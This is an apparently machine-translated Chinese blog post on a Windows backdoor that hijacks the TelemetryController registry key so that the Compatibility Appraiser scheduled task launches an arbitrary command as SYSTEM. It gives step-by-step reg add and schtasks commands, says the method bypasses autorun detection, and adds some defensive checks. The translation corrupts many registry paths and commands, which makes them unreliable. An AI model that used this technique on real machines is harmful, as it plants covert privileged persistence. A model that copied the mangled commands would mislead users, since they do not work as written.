基于远程控制器的后门分析

0x00 前言

我从滥用Windows遥测技术实现持久性中学到了一种由TelemetryController实现的自启动后门方法。在Win10下测试没有问题，但是在Win7和Server2012R2下测试遇到了不同的结果。

本文将记录我的学习经历，分析使用方法，并给出答辩建议。

参考资料：

https://www . trusted sec . com/blog/abiling-windows-telemetry-for-persistence/

0x01 简介

本文将介绍以下内容：

基础知识

常规利用方法

Win7和Server2012R2中的问题

解决办法

使用方法

辩护建议

0x02 基础知识

1.TelemetryController

相应的过程是CompatTelRunner.exe。

CompatTelRunner.exe称之为Windows兼容遥测监控程序。它定期向微软发送使用和性能数据，以改善用户体验并修复潜在的错误。

通常是用来升级win10进行兼容性检查的程序。

由计划任务Microsoft兼容性鉴定员启动

默认情况下，计划任务Microsoft兼容性鉴定器处于启用状态，每隔一天自动运行，任何用户登录时也会运行。

2.计划任务Microsoft Compatibility Appraiser

(1)通过面板查看计划任务

启动taskschd.msc

选择任务计划程序(本地)-任务计划程序库-Microsoft-windows-应用程序体验，然后选择Microsoft兼容性评估器。

如下图

在这里您可以看到计划任务Microsoft兼容性鉴定人的详细信息。

(2)通过命令行查看计划任务

该命令如下所示：

schtasks/查询

如果是在中文操作系统中，可能会出现以下错误：

错误：无法加载列资源。

如下图

检查cmd代码并执行命令：chcp

返回结果：

活动代码页：936

使用936中国GBK代码。

如下图

解决方法：

改为437美国代码，命令如下：chcp 437

再次执行：schtasks /query

结果很正常。

如下图

直接筛选出Microsoft compatibility assessor:

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

显示详细信息：

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft兼容性鉴定人'/v

修改计划任务的状态，并将禁用状态更改为启用：

schtasks/Change/ENABLE/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

0x03 常规利用方法

1.修改注册表

修改注册表HKEY _本地_机器\软件\微软\ Windows NT \当前版本\ appcompatflags \遥测控制器

用任何名称创建一个新密钥。关键信息如下：

命令REG _ SZ C:\ Windows \ system32 \ notepad . exe

每夜REG_DWORD1

上述操作可以通过命令行实现，命令如下：

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ fun '/v Nightly/t REG _ DWORD/d 1

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ fun '/v Command/t REG _ SZ/d ' C:\ Windows \ system32 \ notepad . exe '/f

注：

这里创建了一个名为fun的键。

2.开启计划任务Microsoft Compatibility Appraiser

您可以选择等待计划任务开始。

也可以强制打开，命令如下：

schtasks/run/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

在后门的触发下，Win10系统下的系统权限将立即启动CompatTelRunner.exe和notepad.exe进程。

注：

作为CompatTelRunner.exe的父进程，如果notepad.exe进程正在运行，那么CompatTelRunner.exe进程已被阻塞。

0x04 在Win7和Server2012R2下遇到的问题

方法同上。后门启动后，两个进程的CompatTelRunner.exe将以系统权限启动。

如下图

一个CompatTelRunner.exe的命令行参数是：

c:\ Windows \ system32 \ compatt elrunner . exe-m:apparent . dll-f:DoScheduledTelemetryRun-cv:4 in qvax 40k hdrm 9.1

该进程对应于注册表HKEY _本地_机器\软件\微软\ Windows NT \当前版本\ appcompatflags \遥测控制器\评估器。

经过实际测试，得出以下结论：

一段时间后，如果检查仍未完成，流程CompatTelRunner.exe将继续运行，而流程notepad.exe无法使用系统权限启动。

经过一段时间后，如果完成检查，进程CompatTelRunner.exe会自动退出，接下来以系统权限启动进程CompatTelRunner.exe和notepad.exe

如果选择强制结束进程CompatTelRunner.exe，同样接下来会以系统权限启动进程CompatTelRunner.exe和notepad.exe

如下图

这里我们可以避免这个问题，实现稳定触发，以系统权限启动进程CompatTelRunner.exe和notepad.exe，方法如下：

修改注册表HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator的命令项

默认值为% windir % \ system32 \ compatt El runner。exe-m:明显。dll-f:DoScheduledTelemetryRun

这里可以选择跳过检查过程，例如将命令项的值置空，就不会在计划任务启动时执行检查

为了提高隐蔽性，可以将命令项设置为% windir % \ system32 \ compatt El runner。exe-m:明显。动态链接库

为了验证修改键值是否影响系统的正常功能，可以对% windir % \ system32 \ compatt El runner。可执行程序的扩展名进行反编译

启动进程的伪代码细节如下图

0x05 利用方法

1.前置条件

需要查看是否开启默认的计划任务微软兼容性评估师，查询命令如下：

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft兼容性鉴定人/v

2.放置后门

我在Win7、Server2012R2、Win10测试的结果表明，稳定利用方法如下：

修改注册表HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator的命令项

值设置为c:\ WINDOWS \ system32 \ cmd。exe/c notepad.exe

命令行实现的命令如下：

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v Command/t REG _ EXPAND _ SZ/d ' C:\ Windows \ system32 \ cmd。exe/C记事本。exe '/f

补充：还原配置的命令

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v Command/t REG _ EXPAND _ SZ/d ' % windir % \ system32 \ compatt elrunner。exe-m:评估者。dll-f:DoScheduledTelemetryRun '/f

3.后门触发

等待计划任务微软兼容性鉴定人运行

为了便于测试，可以强制开启，命令如下：

schtasks/run/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

4.特点

能够绕过自动运行的检测，以系统权限执行命令

断网状态下同样能够触发

0x06 防御建议

1.查看注册表的默认值是否被修改

(1)查看注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Appraiser的Command项

命令如下：

reg query ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v命令

默认值如下：

命令REG _ EXPAND _ SZ % windir % \ system32 \ compattelrunner。exe-m:明显。dll-f:DoScheduledTelemetryRun

(2)查看注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController下的Key

命令如下：

注册表查询' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController '

默认值如下：

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ apparetharserver

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ av status

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ Census

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ census server

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \遥测控制器\ inv agent

2.禁用计划任务Microsoft Compatibility Appraiser

命令如下：

schtasks/Change/DISABLE/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

3.查看进程CompatTelRunner.exe信息

分析进程CompatTelRunner.exe下是否有可疑子进程

0x07 小结

本文记录了我对遥测控制器后门机制的学习心得，总结出了更为通用的利用方法，给出针对性的防御建议。

留下回复